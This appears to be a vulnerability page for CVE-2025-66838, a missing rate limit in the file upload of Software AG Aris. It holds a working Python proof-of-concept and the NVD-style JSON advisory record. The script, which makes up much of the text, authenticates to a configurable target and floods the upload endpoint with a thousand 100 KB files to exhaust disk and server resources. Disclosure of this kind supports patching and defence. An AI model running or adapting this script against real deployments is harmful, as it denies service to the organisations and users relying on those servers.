CVE-2025-66838

#!/usr/bin/env python3 """ CVE-2025-66838 PoC - Aris File Upload DoS This PoC demonstrates the lack of rate limiting in Aris file upload functionality. """ import requests import time import sys from pathlib import Path # Configuration TARGET_URL = "http://target-server:8080/aris/api/upload" USERNAME = "attacker" PASSWORD = "password" FILE_SIZE_KB = 100 NUM_FILES = 1000 DELAY = 0.01 # Delay between uploads in seconds def create_test_file(size_kb): """Generate a test file of specified size""" return b'X' * (size_kb * 1024) def authenticate(): """Authenticate and get session token""" session = requests.Session() login_url = f"{TARGET_URL.rsplit('/', 1)[0]}/login" response = session.post(login_url, json={ "username": USERNAME, "password": PASSWORD }) if response.status_code == 200: return session return None def upload_file(session, file_data, filename): """Upload a single file to the target server""" files = {'file': (filename, file_data, 'application/octet-stream')} try: response = session.post(TARGET_URL, files=files, timeout=10) return response.status_code == 200 except requests.exceptions.RequestException: return False def main(): print(f"[*] Starting CVE-2025-66838 PoC") print(f"[*] Target: {TARGET_URL}") session = authenticate() if not session: print("[-] Authentication failed") sys.exit(1) print(f"[+] Authenticated successfully") print(f"[*] Uploading {NUM_FILES} files ({FILE_SIZE_KB}KB each)...") file_data = create_test_file(FILE_SIZE_KB) success_count = 0 for i in range(NUM_FILES): filename = f"malicious_file_{int(time.time())}_{i}.txt" if upload_file(session, file_data, filename): success_count += 1 if (i + 1) % 100 == 0: print(f"[*] Progress: {i+1}/{NUM_FILES} files uploaded") time.sleep(DELAY) total_size_mb = (success_count * FILE_SIZE_KB) / 1024 print(f"\n[+] Completed: {success_count}/{NUM_FILES} files uploaded") print(f"[+] Total data uploaded: {total_size_mb:.2f} MB") print(f"[*] This could cause resource exhaustion on the target server") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-66838", "sourceIdentifier": "[email protected]", "published": "2026-01-07T16:15:51.027", "lastModified": "2026-01-21T22:06:28.983", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Aris v10.0.23.0.3587512 and before, the file upload functionality does not enforce any rate limiting or throttling, allowing users to upload files at an unrestricted rate. An attacker can exploit this behavior to rapidly upload a large volume of files, potentially leading to resource exhaustion such as disk space depletion, increased server load, or degraded performance"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:softwareag:aris:*:*:*:*:*:*:*:*", "versionEndIncluding": "10.0.23.0.3587512", "matchCriteriaId": "073C0921-42E0-48C3-9DDC-65C5D5B34471"}]}]}], "references": [{"url": "https://github.com/saykino/CVE-2025-66838/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.softwareag.com/", "source": "[email protected]", "tags": ["Product"]}]}}